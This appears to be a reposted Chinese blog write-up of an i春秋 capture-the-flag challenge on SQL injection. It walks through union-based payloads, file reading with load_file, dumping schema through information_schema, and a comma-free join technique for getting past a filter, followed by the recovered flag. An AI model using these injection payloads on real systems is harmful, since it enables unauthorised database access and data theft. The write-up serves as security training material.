i春秋-SQLi（无逗号sql注入，-- -注释）

i春秋-SQLi（无逗号sql注入，-- -注释）

bicheng/2024/11/14 5:19:51/文章来源:https://blog.csdn.net/2301_79090248/article/details/143718659

练习平台地址

竞赛中心

题目描述

后台有获取flag的线索应该是让我们检查源码找到后台

题目内容

空白一片

F12检查源码

发现login.php

访问login.php?id=1

F12没有提示尝试sql注入

常规sql注入

//联合注入得到表格列数

1' order by 3 #

1' union select 1,2,3 #（看哪个存在sql注入）

//查看当前权限
user()

//如果有root权限和绝对路径，可以使用load_file函数访问系统文件，将内容以字符串形式返回
1'/**/union/**/select 1,load_file("/var/www/html/flag.php"),3,4#

//拿数据库名
database()

//拿表名
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="xxx"#

//找表的字段
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="xxx"#

//找数据
1' union select 1,group_concat(data),3,4 from "xxx";#

参考WP

i春秋-后台有获取flag的线索-flag{6deb7ea8-4a31-4f48-ac7e-4d864c466a0a}_flag{c04165a53bec1848bfac2dfda3e667bb}-CSDN博客

发现是后台对逗号以后的输入做了截断处理

相关知识：无逗号注入语句

普通sql语句

union select group_concat(table_name) from information_schema.tables where table_schema=database(),user()

无逗号注入语句

union select * from ((select group_concat(table_name) from information_schema.tables where table_schema=database())a join (select user())b)

解题

真正的注入页面是l0gin.php

order by 3时返回异常，表有两列

?id=1' order by 3-- -

查看哪里有回显点

-1' union select * from (select 1) a join (select 2) b-- -

爆表

这里也可以先查询数据库名字，有时候这里database()无法执行成功

?id=-1' union select * from (select 1) a join (select group_concat(table_name) from information_schema.tables where table_schema = database()) b-- -

爆字段名

?id=-1' union select * from (select 1) a join (select group_concat(column_name) from information_schema.columns where table_name = 'users') b-- -

发现flag,构造payload查询

-1' union select * from (select 1) a join (select group_concat(flag_9c861b688330) from users) b-- -

flag

flag{555913f1-3553-4fcf-a51b-5f6f1c5ccb13}

注意事项

1.注释的类型，#,--+,-- -,--

2.注意判断后台过滤字符并构建payload

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/bicheng/60560.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

sql注入之二次注入（sqlilabs-less24）

sql注入之二次注入（sqlilabs-less24）

二阶注入（Second-Order Injection）是一种特殊的 SQL 注入攻击，通常发生在用户输入的数据首先被存储在数据库中，然后在后续的操作中被使用时，触发了注入漏洞。与传统的 SQL 注入（直接注入）不同&a…

阅读更多...

nginx 部署2个相同的vue

nginx 部署2个相同的vue

起因： 最近遇到一个问题，在前端用nginx 部署 vue， 发现如果前端有改动，如果不适用热更新，而是直接复制项目过去，会404 因此想到用nginx 负载两套相同vue项目，然后一个个复制vue项目就可以了。…

阅读更多...

MySQL：CRUD

MySQL：CRUD

MySQL表的增删改查（操作的是表中的记录） CRUD(增删改查) C-Create新增R-Retrieve检查，查询U-Update更新D-Delete删除新增（Create） 语法： 单行数据全列插入 insert into 表名[字段一，字段…

阅读更多...

centos7 node升级到node18

centos7 node升级到node18

使用jenkins发布vue3项目提示node18安装失败错误日志： /var/lib/jenkins/tools/jenkins.plugins.nodejs.tools.NodeJSInstallation/Node18/bin/node: /lib64/libm.so.6: version GLIBC_2.27 not found (required by /var/lib/jenkins/tools/jenkins.plugins.node…

阅读更多...

万字长文解读深度学习——ViT、ViLT、DiT

万字长文解读深度学习——ViT、ViLT、DiT

文章目录 🌺深度学习面试八股汇总🌺ViT1. ViT的基本概念2. ViT的结构与工作流程1. 图像分块（Image Patch Tokenization）2. 位置编码（Positional Encoding）3. Transformer 编码器（Transformer En…

阅读更多...

MFC中Excel的导入以及使用步骤

MFC中Excel的导入以及使用步骤

参考地址在需要对EXCEL表进行操作的类中添加以下头文件：若出现大量错误将其放入stdafx.h中 #include "resource.h" // 主符号 #include "CWorkbook.h" //单个工作簿 #include "CRange.h" //区域类，对Excel大…

阅读更多...

前端开发中常用的包管理器（npm、yarn、pnpm、bower、parcel）

前端开发中常用的包管理器（npm、yarn、pnpm、bower、parcel）

文章目录 1. npm (Node Package Manager)2. Yarn (Yarn Package Manager)3. pnpm4. Bower5. Parcel总结前端开发中常用的包管理器主要有以下几个： 1. npm (Node Package Manager) 简介： npm 是 Node.js 的默认包管理器，也是最广泛使用的包…

阅读更多...

Linux（CentOS）安装 Nginx

Linux（CentOS）安装 Nginx

CentOS版本：CentOS 7 Nginx版本：1.24.0 两种安装方式： 一、通过 yum 安装，最简单，一键安装，全程无忧。二、通过编译源码包安装，需具备配置相关操作。最后附：设置 Nginx 服务开…

阅读更多...

深度学习项目启动（笔记用）

深度学习项目启动（笔记用）

深度学习项目启动项目配置虚拟环境项目配置虚拟环境

阅读更多...

万字长文解读深度学习——卷积神经网络CNN

万字长文解读深度学习——卷积神经网络CNN

推荐阅读： 卷积神经网络（CNN）详细介绍及其原理详解 CNN笔记：通俗理解卷积神经网络文章目录 🌺深度学习面试八股汇总🌺主要组件输入层卷积层 (Convolutional Layer)批归一化层（Batch Normalizat…

阅读更多...

VBA10-处理Excel的动态数据区域

VBA10-处理Excel的动态数据区域

一、end获取数据边界 1、基本语法 1-1、示例： 2、配合row和column使用 2-1、示例1 2-2、示例2 此时，不管这个有数值的区域，怎么增加边界，对应的统计数据也会跟着变的！ 二、end的缺陷若是数据区域不连贯，则…

阅读更多...

Spring boot + Vue2小项目基本模板

Spring boot + Vue2小项目基本模板

Spring boot Vue2小项目基本模板基本介绍基本环境安装项目搭建最终效果展示基本介绍项目来源哔哩哔哩的青戈，跟着学习搭建自己的简单vue小项目；看别人的项目总觉得看不懂，需要慢慢打磨这里目前只简单的搭建了菜单导航和表格页面&#x…

阅读更多...

“箱体分析”，箱体支撑压力位，分析市场方向通达信主图源码

“箱体分析”，箱体支撑压力位，分析市场方向通达信主图源码

使用技巧该指标用于在通达信的K线图上绘制箱体分析图形，主要通过支撑位、波浪顶、箱体上下限等多个技术指标来识别股票的支撑和压力区域。支撑位分析：可以帮助用户识别股价的支撑区域，并判断是否会反弹。箱体震荡区间识别：通…

阅读更多...

PICO+Unity MR视频透视

PICO+Unity MR视频透视

官方链接：视频透视 | PICO 开发者平台在 PXR_Manager (Script) 面板上，勾选 Video Seethrough 选框 2.将 Clear Flags 设置为 Solid Color。颜色设置为黑色，Alpha 通道设置为完全透明 3.在代码中开启透视 using System.Collections; usin…

阅读更多...

大学生福音！用gpt-4o和o1大模型拿捏大学化学作业

大学生福音！用gpt-4o和o1大模型拿捏大学化学作业

文章目录零、前言一、使用GPT操作指导作业拍照使用o1-preview大模型小结二、感受零、前言昨天发了gpt-4o拿捏大学物理作业，群友说，急需要一位化学老师指导虚竹哥是宠粉的，连夜请了一位博士级的化学老师~ 一、使用GPT 操作指导 ChatG…

阅读更多...

2024-11-12 学习人工智能的Day25 scikit-learn库初见

2024-11-12 学习人工智能的Day25 scikit-learn库初见

简简单单的数据集 from sklearn.datasets import load_iris/fectch 简单的引用世界数据集和玩具数据集方式 #下面是在获取数据集后常用的值 feature feature_names DESCR target target_names filename from sklearn.datasets import load_iris import numpy as np import…

阅读更多...

2024 年将 Postman 文档导出为 HTML 或 Markdown

2024 年将 Postman 文档导出为 HTML 或 Markdown

2024 年将 Postman 文档导出为 HTML 或 Markdown

阅读更多...

访问网页的全过程（知识串联）

访问网页的全过程（知识串联）

开发岗中总是会考很多计算机网络的知识点，但如果让面试官只靠一道题，便涵盖最多的计网知识点，那可能就是网页浏览的全过程了。本篇文章将带大家从头到尾过一遍这道被考烂的面试题，必会！！！ 总…

阅读更多...

服务器硬件介绍

服务器硬件介绍

计算机介绍现在的人们几乎无时无刻都在使用电脑！而且已经离不开电脑了。像桌上的台式电脑(桌机)、笔记本电脑(笔电)、平板电脑、智能手机等等，这些东西都算是电脑。台式机电脑介绍计算机又被称为电脑。台式机电脑主要分为主机和显示器两个部分&…

阅读更多...

04-HTTP协议、请求报文、响应报文

04-HTTP协议、请求报文、响应报文

欢迎来到“雪碧聊技术”CSDN博客！ 在这里，您将踏入一个专注于Java开发技术的知识殿堂。无论您是Java编程的初学者，还是具有一定经验的开发者，相信我的博客都能为您提供宝贵的学习资源和实用技巧。作为您的技术向导，我将…

阅读更多...

推荐文章

最新文章